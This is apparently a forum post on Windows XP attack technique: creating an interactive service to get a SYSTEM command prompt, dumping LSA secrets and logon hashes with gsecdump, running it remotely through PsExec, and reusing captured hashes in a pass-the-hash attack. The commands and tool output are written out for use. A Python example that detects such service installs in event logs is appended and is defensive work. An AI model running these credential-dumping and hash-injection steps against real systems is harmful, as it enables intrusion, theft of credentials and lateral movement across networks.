To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to import the hash information just grabbed with gsecdump into the local lsass process and carry out a hash-injection attack. Those foreigners really are good at this; administrators will be kept busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually don't need the password cracked at all; this is simply using the tool. As the original article puts it well, whether the password is 4 characters or 127, once you have the hash it's 100% done.

Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
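As an added example (not from the original post or from any of the tools it names), here is the detection logic a defender would run over Windows System log entries for the sc create trick above: it flags Service Control Manager event 7045 (service installed) whenever the service image is a shell interpreter or the PsExec service, and shows that the 7000/7009 start failure that follows (error 1053 in the post) is not a reason to discard the alert. The one-line "<EventID>|<Source>|<Message>" export format and the log entries themselves are constructed for the example; the event IDs and message wording are the real SCM ones.

```python
import re

# Interpreters that should never be a service image (assumption: tune per site).
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# Constructed sample export of the System log ("<EventID>|<Source>|<Message>"), mirroring
# the post's sc create / sc start sequence, a PsExec -s run, and one legitimate service.
SAMPLE_LOG = r"""
7045|Service Control Manager|A service was installed in the system. Service Name: shellcmdline Service File Name: C:\WINDOWS\system32\cmd.exe /K start Service Type: user mode service Service Start Type: demand start Service Account: LocalSystem
7009|Service Control Manager|Timeout (30000 milliseconds) waiting for the shellcmdline service to connect.
7000|Service Control Manager|The shellcmdline service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
7045|Service Control Manager|A service was installed in the system. Service Name: PSEXESVC Service File Name: C:\WINDOWS\PSEXESVC.EXE Service Type: user mode service Service Start Type: demand start Service Account: LocalSystem
7045|Service Control Manager|A service was installed in the system. Service Name: Spooler Service File Name: C:\WINDOWS\system32\spoolsv.exe Service Type: user mode service Service Start Type: auto start Service Account: LocalSystem
"""
EVT_7045 = re.compile(r"Service Name: (?P<name>.+?) Service File Name: (?P<path>.+?) "
                      r"Service Type: .*?Service Account: (?P<account>\S+)")

def image_name(cmdline):
    """Lower-cased executable name from a service command line (quoted path or trailing args ok)."""
    cmdline = cmdline.strip()
    exe = cmdline[1:].split('"', 1)[0] if cmdline.startswith('"') else cmdline.split()[0]
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_suspicious_services(log_text):
    """Return (service name, image, account, reasons) for every 7045 event worth alerting on."""
    hits = []
    for line in log_text.strip().splitlines():
        event_id, _source, message = line.split("|", 2)
        m = EVT_7045.search(message) if event_id == "7045" else None
        if not m:
            continue
        svc, image, reasons = m.groupdict(), image_name(m["path"]), []
        if image in SHELL_IMAGES:
            reasons.append("shell interpreter as service image")
        if image == "psexesvc.exe":  # PsExec's own service binary
            reasons.append("PsExec service install")
        if reasons and svc["account"].lower() == "localsystem":
            reasons.append("runs as LocalSystem")
        if reasons:
            hits.append((svc["name"], image, svc["account"], reasons))
    return hits

def start_failures(log_text):
    """Services that later logged a 7000/7009 start failure. Do NOT suppress the 7045 alert on
    this: cmd.exe was launched and 'start' spawned a window that outlives the SCM timeout."""
    names = set()
    for line in log_text.strip().splitlines():
        event_id, _source, message = line.split("|", 2)
        if event_id in ("7000", "7009"):
            m = re.search(r"the (\S+) service", message, re.I)
            if m:
                names.add(m.group(1))
    return names
```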